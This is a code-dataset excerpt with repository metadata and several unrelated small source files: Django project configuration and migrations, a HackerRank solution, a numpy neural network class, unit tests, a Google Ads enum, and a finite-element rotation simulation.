blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acd099225a02f96c7d3c8ff511a976350a843ec3
|
55610cce405fd4f2809bd7d26b4f19b9c2b1d3cd
|
/make_up/migrations/0002_makeuptask_student.py
|
718d9dd7a33b84b0bdd3e99ef57ad00ce51b2c8a
|
[] |
no_license
|
zzzzty/jtdx
|
30d648cf06f259dfb55227a1fb64b74a24afdd85
|
4486d9073416b7df8b93ac47d1b29256a4dff260
|
refs/heads/master
| 2020-06-07T14:02:02.074749
| 2019-12-26T07:46:40
| 2019-12-26T07:46:40
| 193,014,124
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
# Generated by Django 2.2.2 on 2019-07-06 07:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('student', '0002_student_nick_name'),
('make_up', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='makeuptask',
name='student',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='student.Student'),
),
]
|
[
"zzzliusong@163.com"
] |
zzzliusong@163.com
|
0b48da007baa45e59cf83c9b05f368505db68388
|
3d231cc28740289606b44b358edf33819dc89682
|
/Hacker_rank/hacker_rank_average.py
|
290785d57b22d2af3125d096199b8cba13fd8684
|
[] |
no_license
|
byuvraj/Solution_for_python_challanges
|
f49f031c89e5bb65a80ae6dd2dfbbb3a0b143e25
|
d41e92c5cf93bed3265ff7ec26f8d8d34f149297
|
refs/heads/main
| 2023-08-18T19:41:59.350427
| 2021-10-14T10:53:09
| 2021-10-14T10:53:09
| 373,757,156
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
if __name__ == '__main__':
n = int(input())
student_marks = {}
for _ in range(n):
name, *line = input().split()
scores = list(map(float, line))
student_marks[name] = scores
query_name = input()
marks = student_marks[query_name]
avg=0
print(marks)
n_ =len(marks)
for i in range(0,n_):
avg=marks[i]+avg
avg = avg/n_
print("{0:.2f}".format(avg))
|
[
"byuvaj0202@gmail.com"
] |
byuvaj0202@gmail.com
|
54348e0bd8926ccdffa383c51db801b380d5f575
|
428f2c48d6e9dabc3ac63012d4146b98bc38efc1
|
/refresh/refresh/wsgi.py
|
5f348f3bcbf706c24a9dad495e9bb99837caa19e
|
[] |
no_license
|
Arange-code/Django-project
|
f96d61fcebe0aa93bd311f86fe0a0f539b0b68f5
|
53527d1f442d87f8ac8f37d0c544168670e054cf
|
refs/heads/master
| 2021-02-05T12:29:56.201975
| 2020-02-28T14:31:58
| 2020-02-28T14:31:58
| 243,780,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
"""
WSGI config for refresh project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'refresh.settings')
application = get_wsgi_application()
|
[
"you@example.com"
] |
you@example.com
|
233695bb1c57dade93d46c11765d5914bc3e29e0
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03039/s199470028.py
|
5afbcf0436e1e2a41276ee67cfaa4072153695af
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
from itertools import combinations
def solve(N, M, K):
#A = [(n, m) for n in range(N) for m in range(M)]
r = 0
for x in range(N):
r += x * (N - x) * M * M
for y in range(M):
r += y * (M - y) * N * N
return r
def main():
N, M, K = map(int, input().split())
g1 = [1, 1]
g2 = [1, 1]
inverse = [0, 1]
mod = 10 ** 9 + 7
for i in range(2, N * M):
g1.append((g1[-1] * i) % mod)
inverse.append((-inverse[mod % i] * (mod // i)) % mod)
g2.append((g2[-1] * inverse[-1]) % mod)
t = solve(N, M, 2)
for k in range(2, K):
t = t * (N * M - k) * inverse[k - 1] % mod
print(t)
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
e6c4f39cad3a7e6cc5c02477d45d515ac44f6b5b
|
060ff392f361e4141d7d2add4282cd8ec67d055d
|
/musify/asgi.py
|
bc02da036c98fd237532dccce5998c699977136b
|
[] |
no_license
|
omlondhe/ReactDjango-MusifyApp
|
cfe61d85bccd583a2b7658f33b234869af008143
|
4fe3a18b2a425df0a860dcbb572b3a51227779e9
|
refs/heads/main
| 2023-02-06T01:54:31.279052
| 2020-12-28T17:51:31
| 2020-12-28T17:51:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
"""
ASGI config for musify project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'musify.settings')
application = get_asgi_application()
|
[
"oplondhe@gmail.com"
] |
oplondhe@gmail.com
|
9918758e1b829eee564875e4744dd8f4094f8f34
|
bbefc4e1252b984625bc5b94b244d2e9838e4100
|
/neuralnetwork/neuralNetwork.py
|
e8bd07d938d8993b0597b093db7adf1cad62f94b
|
[] |
no_license
|
ckethan0429/Machine-Learning
|
5a8add0a8c56695b1d874c9f4bc44236b39dcd2d
|
d6d1b5fb2ceda866e8334a0a6d2a8bf5df864a3c
|
refs/heads/master
| 2020-05-03T13:36:22.147819
| 2019-04-02T11:54:33
| 2019-04-02T11:54:33
| 178,656,912
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,641
|
py
|
import numpy
from scipy.special import expit
import pandas as pd
class neuralNetwork:
#신경망 초기화하기
def __init__(self, inputnodes, hiddennodes, outputnodes, learningrate, path = None):
#입력, 은닉, 출력 계층의 노드 개수 설정
self.inodes = inputnodes
self.hnodes = hiddennodes
self.onodes = outputnodes
#학습률
self.lr = learningrate
#가중치 행렬
if(path != None) :
self.load_weight(path)
else:
self.wih = numpy.random.normal(0.0, pow(self.hnodes, -0.5), (self.hnodes, self.inodes))
self.who = numpy.random.normal(0.0, pow(self.onodes, -0.5), (self.onodes, self.hnodes))
#활성화 함수로 시그모이드 함수 설정
self.activation_function = lambda x: expit(x)
pass
def load_weight(self, path):
self.wih = pd.read_csv(path + "_wih.csv", header=None)
self.who = pd.read_csv(path + "_who.csv", header=None)
def save_weight(self, path):
pd.DataFrame(self.wih).to_csv(path+ "_wih.csv", index = False, header= None)
pd.DataFrame(self.who).to_csv(path+ "_who.csv", index = False, header= None)
#신경망 학습시키기
def train(self, inputs_list, targets_list):
#입력 리스트를 2차원 행렬로 변환
inputs = numpy.array(inputs_list, ndmin=2).T
targets = numpy.array(targets_list, ndmin=2).T
#은닉계층으로 들어오는 신호를 계산
hidden_inputs = numpy.dot(self.wih, inputs)
#은닉계층에서 나가는 신호를 계산
hidden_outputs = self.activation_function(hidden_inputs)
#최종 출력 계층으로 들어오는 신호를 계산
final_inputs = numpy.dot(self.who, hidden_outputs)
#최종 출력 계층으로 나가는 신호를 계산
final_outputs = self.activation_function(final_inputs)
#2단계 가중치 업데이트
#출력계층의 오차(실제값 - 계산값)
output_errors = targets - final_outputs
#은닉계층의 오차는 가중치 값의 비례로 재조정
hidden_errors = numpy.dot(self.who.T, output_errors)
#은닉계층과 출력계층간의 가중치 업데이트
self.who += self.lr * numpy.dot((output_errors * final_outputs * (1.0 - final_outputs)), numpy.transpose(hidden_outputs))
self.wih += self.lr * numpy.dot((hidden_errors * hidden_outputs * (1.0 - hidden_outputs)), numpy.transpose(inputs))
#신경망에 질의하기
def query(self, inputs_list):
#입력 리스트를 2차원 행렬로 변환
inputs = numpy.array(inputs_list, ndmin=2).T
#은닉계층으로 들어오는 신호를 계산
hidden_inputs = numpy.dot(self.wih, inputs)
#은닉계층에서 나가는 신호를 계산
hidden_outputs = self.activation_function(hidden_inputs)
#최종 출력 계층으로 들어오는 신호를 계산
final_inputs = numpy.dot(self.who, hidden_outputs)
#최종 출력 계층으로 나가는 신호를 계산
final_outputs = self.activation_function(final_inputs)
return final_outputs
if __name__ == "__main__":
#입력, 은닉, 출력 노드의 수
input_nodes = 3
hidden_nodes = 3
output_nodes = 3
#학습률은 0.3으로 정의
learning_rate = 0.3
#신경망의 인스턴스를 생성
n = neuralNetwork(input_nodes, hidden_nodes,output_nodes, learning_rate)
print("n.query = ", n.query([1.0, 0.5, -1.5]))
|
[
"oops0429@gmail.com"
] |
oops0429@gmail.com
|
6aa35f7716f196962697548423b8318a68aeb789
|
981e6d9d34a91852407d45c4b7863779e228a516
|
/venv/bin/django-admin.py
|
92b413158aeac93a5d38ab2670da12a6bbeeaa4c
|
[] |
no_license
|
starwayagency/astrolabium_viber_bot
|
5062ffcb7b35b3608f9434fd486e5806e9084ae1
|
ec4e699bbc32e7275da0f12d77a0ae5cf32d000e
|
refs/heads/master
| 2023-08-18T06:36:43.315701
| 2021-10-24T18:04:31
| 2021-10-24T18:04:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
#!/home/jurgeon/projects/astrolabium/astrolabium_viber_bot/venv/bin/python3
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
|
[
"jurgeon018@gmail.com"
] |
jurgeon018@gmail.com
|
e9734d05b7e16399760fe649e8c74a4afdef02c4
|
c8b5d05ff16d422ec05addb99f208467f01fa373
|
/tests/Character_tests.py
|
c1133329199065c0a91a490c00f3c6fc7b34fcab
|
[] |
no_license
|
PreslavaKuzova/Dungeons-And-Pythons
|
298105ba51ef4a10e35461c3fcef5818d0934b53
|
5629e63a09a34e5e820383da0509cb67147ec19d
|
refs/heads/master
| 2020-05-07T11:05:20.120814
| 2019-04-15T14:37:42
| 2019-04-15T14:37:42
| 180,445,498
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
import unittest
import os, sys
sys.path.insert(0, '../')
from Character import *
class HeroTests(unittest.TestCase):
def test_init_value(self):
c = Character(20)
self.assertEqual(c.get_health(), 20)
def test_when_damage_is_taken_and_substract_that_much_from_the_health(self):
c = Character(100)
c.take_damage(20)
self.assertEqual(c.get_health(), 80)
def test_when_damage_taken_is_more_that_the_health_then_health_equals_zero(self):
c = Character(50)
c.take_damage(60)
self.assertEqual(c.get_health(), 0)
def test_when_damage_taken_is_more_that_the_health_then_character_is_dead(self):
c = Character(50)
c.take_damage(60)
self.assertFalse(c.is_alive())
def test_when_damage_taken_is_less_that_the_health_then_character_is_dead(self):
c = Character(60)
c.take_damage(50)
self.assertTrue(c.is_alive())
def test_when_starting_with_no_health_and_test_whether_it_is_alive(self):
c = Character(0)
self.assertFalse(c.is_alive())
if __name__ =='__main__':
unittest.main()
|
[
"preslava.kuzova@gmail.com"
] |
preslava.kuzova@gmail.com
|
8677a029b2db44ceafb04e7963b4cf60db2cacb9
|
532fdd01a9080d9980c18a68789b45b207e68550
|
/aaltomood/urls.py
|
ff8e5a84280efce7778b11e53cf5e51f08288ade
|
[] |
no_license
|
tonipel/aaltomood
|
3b85fe73b2b7bdf7eabcb591db33da276506871c
|
3ef2fb7ee65a166d1c6e7960b6f492dab951625e
|
refs/heads/master
| 2023-01-05T19:26:23.083041
| 2020-11-07T22:06:14
| 2020-11-07T22:06:14
| 310,659,482
| 0
| 0
| null | 2020-11-07T11:47:03
| 2020-11-06T17:12:37
|
Python
|
UTF-8
|
Python
| false
| false
| 913
|
py
|
"""aaltomood URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
from django.contrib.auth import views as auth_views
urlpatterns = [
path('mood/', include('mood.urls')),
path('admin/', admin.site.urls),
path('accounts/', include('django.contrib.auth.urls')),
]
|
[
"toni.pellinen@hotmail.com"
] |
toni.pellinen@hotmail.com
|
90b90c1af562cd40a9888489a3719f6af2d1acba
|
eaad714626b105134a8b6d4d6e316a6aab1e436a
|
/prayas/prayas/urls.py
|
ff37d21e139ea46ca9594cf2875e381e45598a70
|
[] |
no_license
|
pradeeppc/Elearning-Web-App
|
967070e130249423b98111de62269ea8e4fd2312
|
49aeb430b5fecccd49d2a9e9332fcd8f138662a4
|
refs/heads/master
| 2023-03-21T15:28:52.565546
| 2021-03-13T15:16:24
| 2021-03-13T15:16:24
| 149,626,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,359
|
py
|
"""prayas URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from django.contrib.auth import views as auth_views
from courses.views import CourseListView
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('accounts/login/', auth_views.LoginView.as_view(), name='login'),
path('accounts/logout/', auth_views.LogoutView.as_view(), name='logout'),
path('admin/', admin.site.urls),
path('course/', include('courses.urls')),
path('', CourseListView.as_view(), name='course_list'),
path('students/', include('students.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
[
"pradeeep765@gmail.com"
] |
pradeeep765@gmail.com
|
094f154dc9007753efa071553ad662baa9cb66f4
|
9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56
|
/google/ads/googleads/v10/enums/types/matching_function_operator.py
|
11a366438b14b5a9625600a5fa27c1e72a1abe49
|
[
"Apache-2.0"
] |
permissive
|
GerhardusM/google-ads-python
|
73b275a06e5401e6b951a6cd99af98c247e34aa3
|
676ac5fcb5bec0d9b5897f4c950049dac5647555
|
refs/heads/master
| 2022-07-06T19:05:50.932553
| 2022-06-17T20:41:17
| 2022-06-17T20:41:17
| 207,535,443
| 0
| 0
|
Apache-2.0
| 2019-09-10T10:58:55
| 2019-09-10T10:58:55
| null |
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v10.enums",
marshal="google.ads.googleads.v10",
manifest={
"MatchingFunctionOperatorEnum",
},
)
class MatchingFunctionOperatorEnum(proto.Message):
r"""Container for enum describing matching function operator."""
class MatchingFunctionOperator(proto.Enum):
r"""Possible operators in a matching function."""
UNSPECIFIED = 0
UNKNOWN = 1
IN = 2
IDENTITY = 3
EQUALS = 4
AND = 5
CONTAINS_ANY = 6
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"noreply@github.com"
] |
noreply@github.com
|
13feaddae7e89a0fa743ed4afd4a49c1ec6a1f26
|
1701f11946debbca91708f5bb69c494cfbb4fb7a
|
/benwillkommen/benwillkommen/settings.py
|
2f2127bf772da4463f293c31c43a29727963d930
|
[] |
no_license
|
benwillkommen/benwillkommen.com
|
4b3f8515c83a51e13023a402dd79d4759baee3b9
|
b00041d67f910435cc8b9f5d364e1e282cee9775
|
refs/heads/master
| 2020-05-18T18:01:54.760330
| 2014-03-16T03:20:44
| 2014-03-16T03:20:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,549
|
py
|
# Django settings for benwillkommen project.
#modification for playing w/ git
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'benwillkommen', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': 'localhost', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
'TIME_ZONE': 'US/Central'
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'US/Central'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'j36b4t9$fx#^qmy8nx$*219vsbnp%dp+9yoj3^*#td$^3!i!ah'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'benwillkommen.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'benwillkommen.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
[
"benwillkommen@gmail.com"
] |
benwillkommen@gmail.com
|
10a528647749bc0baae12598193504377e143439
|
f834363c77fed59810549fc61d569ebbaa84de82
|
/blog/database.py
|
91fa4dfa953ee73949b6df890af45aee99db64dc
|
[] |
no_license
|
jonnyfram/blog
|
b77d8aeb5ead1fe7f7659547dc432fb4249d662f
|
db79ab174978a3517bc8143d046247d96fd32aa2
|
refs/heads/master
| 2020-04-06T04:17:25.343030
| 2017-07-06T14:37:04
| 2017-07-06T14:37:04
| 95,437,255
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,151
|
py
|
import datetime
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Text, DateTime
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship
from . import app
from flask_login import UserMixin
engine = create_engine(app.config["SQLALCHEMY_DATABASE_URI"])
Base = declarative_base()
Session = sessionmaker(bind=engine)
session = Session()
class Entry(Base):
__tablename__ = "entries"
id = Column(Integer, primary_key=True)
title = Column(String(1024))
content = Column(Text)
datetime = Column(DateTime, default=datetime.datetime.now())
author_id = Column(Integer, ForeignKey('users.id'))
#def generaet_summary(self):
# return self.content[0:100]
class User(Base, UserMixin):
__tablename__ = "users"
id = Column(Integer, primary_key=True)
name = Column(String(128))
email = Column(String(128), unique=True)
password = Column(String(128))
entries = relationship("Entry", backref="author")
Base.metadata.create_all(engine)
|
[
"jonnyfram@gmail.com"
] |
jonnyfram@gmail.com
|
c4f1e1e1f8733b767ee1c04540805b7abc0a0d9b
|
5329cfea55404d9bbff223d761f06e2ec27c1ab7
|
/djangonautic/manage.py
|
6b1f7568039bef8fb496997b55bbbb4df8431254
|
[] |
no_license
|
rohit1717/articles-django-
|
c2d6fe202d62b1c3b56bec25f896fced23247f53
|
669e7186cc1b26b70f87ee8c4b782d0743c5bd8a
|
refs/heads/master
| 2022-12-02T21:44:50.231428
| 2020-08-20T17:54:22
| 2020-08-20T17:54:22
| 289,074,266
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 809
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangoautic.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
[
"rohitsingh17172000@gmail.com"
] |
rohitsingh17172000@gmail.com
|
87a8307caea5976b9dea43adb38dbb519f275bcd
|
3474b315da3cc5cb3f7823f19a18b63a8da6a526
|
/scratch/KRAMS/src/apps/scratch/jakub/nonlocal_averaging/2d_rotation.py
|
44dd801a3538e23552901d09a1db0e020abcbe31
|
[] |
no_license
|
h4ck3rm1k3/scratch
|
8df97462f696bc2be00f1e58232e1cd915f0fafd
|
0a114a41b0d1e9b2d68dbe7af7cf34db11512539
|
refs/heads/master
| 2021-01-21T15:31:38.718039
| 2013-09-19T10:48:24
| 2013-09-19T10:48:24
| 29,173,525
| 0
| 0
| null | 2015-01-13T04:58:57
| 2015-01-13T04:58:56
| null |
UTF-8
|
Python
| false
| false
| 5,857
|
py
|
from ibvpy.api import \
TStepper as TS, RTraceGraph, TLoop, \
TLine, BCDof, IBVPSolve as IS, DOTSEval, FEDomain, FERefinementGrid,\
FEGrid, BCSlice
from apps.scratch.jakub.mlab.mlab_trace import RTraceDomainListField
from ibvpy.mats.mats2D.mats2D_sdamage.mats2D_sdamage import MATS2DScalarDamage
from ibvpy.mats.mats2D.mats2D_elastic.mats2D_elastic import MATS2DElastic
from ibvpy.mats.mats2D.mats2D_sdamage.strain_norm2d import Euclidean, Mazars, Rankine
from ibvpy.fets.fets2D.fets2D4q import FETS2D4Q
from ibvpy.fets.fets2D.fets2D4q9u import FETS2D4Q9U
from ibvpy.fets.fets2D.fets2D4q8u import FETS2D4Q8U
from averaging import UniformDomainAveraging, LinearAF, QuarticAF
from numpy import array, cos, sin, pi,sqrt, deg2rad, arctan
from mathkit.mfn.mfn_line.mfn_line import MFnLineArray
from ibvpy.dots.avg_fn import AveragingFunction, LinearAF,QuarticAF
def app():
mp = MATS2DScalarDamage(E = 1.,
nu = 0.2,
epsilon_0 = 1.e-3,
epsilon_f = 5.e-3,
#stiffness = "algorithmic",
stress_state = "plane_strain",
stiffness = "secant",
strain_norm = Euclidean())
me = MATS2DElastic(E = 34e3,
nu = 0.,
stress_state = "plane_strain")
fets_eval = FETS2D4Q9U(mats_eval = me, ngp_r = 3, ngp_s = 3)
# Discretization
fe_domain = FEDomain()
fe_level1 = FERefinementGrid( domain = fe_domain,
fets_eval = fets_eval,
averaging = QuarticAF(radius = 0.25,
correction = True))
fe_grid = FEGrid( #coord_min = (-1.,-.5,0.),
coord_max = (2.,1.,0.),
shape = (20,10),
fets_eval = fets_eval,
level = fe_level1 )
mf = MFnLineArray( #xdata = arange(10),
ydata = array([0,1,1]) )
angle = 2.#[deg]
angle_r = deg2rad(angle)
s_angle = sin(angle_r/2.)
c_angle = cos(angle_r/2.)
l_diag = sqrt(5.)
d_angle = arctan(0.5)
s_diag = sin((angle_r+d_angle))
c_diag = cos((angle_r+d_angle))
ts = TS(sdomain = fe_domain,
# conversion to list (square brackets) is only necessary for slicing of
# single dofs, e.g "get_left_dofs()[0,1]" which elsewise retuns an integer only
bcond_list = [
# constraint for all left dofs in y-direction:
BCSlice(var='u', slice = fe_grid[0,0,0,0],dims=[0,1], value = 0.),
BCSlice(var='u', slice = fe_grid[-1,0,-1,0],dims=[1],
time_function = mf.get_value, value = 2*s_angle*2*c_angle),
BCSlice(var='u', slice = fe_grid[-1,0,-1,0],dims=[0],
time_function = mf.get_value, value = - 2*s_angle**2*2),
BCSlice(var='u', slice = fe_grid[0,-1,0,-1],dims=[0],
time_function = mf.get_value, value = - 1*s_angle*2*c_angle),
BCSlice(var='u', slice = fe_grid[0,-1,0,-1],dims=[1],
time_function = mf.get_value, value = - 1*s_angle**2*2),
BCSlice(var='u', slice = fe_grid[-1,-1,-1,-1],dims = [1],
time_function = mf.get_value, value = s_diag*l_diag - 1.),
BCSlice(var='u', slice = fe_grid[-1,-1,-1,-1],dims = [0],
time_function = mf.get_value, value = c_diag*l_diag - 2.)
],
rtrace_list = [
# RTraceGraph(name = 'Fi,right over u_right (iteration)' ,
# var_y = 'F_int', idx_y = right_dof,
# var_x = 'U_k', idx_x = right_dof,
# record_on = 'update'),
RTraceDomainListField(name = 'Deformation' ,
var = 'eps', idx = 0,
record_on = 'update'),
RTraceDomainListField(name = 'Displacement' ,
var = 'u', idx = 1,
record_on = 'update',
warp = True),
RTraceDomainListField(name = 'Damage' ,
var = 'omega', idx = 0,
record_on = 'update',
warp = True),
# RTraceDomainField(name = 'Stress' ,
# var = 'sig', idx = 0,
# record_on = 'update'),
# RTraceDomainField(name = 'N0' ,
# var = 'N_mtx', idx = 0,
# record_on = 'update')
]
)
# Add the time-loop control
#
tl = TLoop( tstepper = ts,
tolerance = 1.e-4,
tline = TLine( min = 0.0, step = 1., max = 2.0 ))
tl.eval()
# Put the whole stuff into the simulation-framework to map the
# individual pieces of definition into the user interface.
#
from ibvpy.plugins.ibvpy_app import IBVPyApp
ibvpy_app = IBVPyApp( ibv_resource = ts )
ibvpy_app.main()
if __name__ == '__main__':
app()
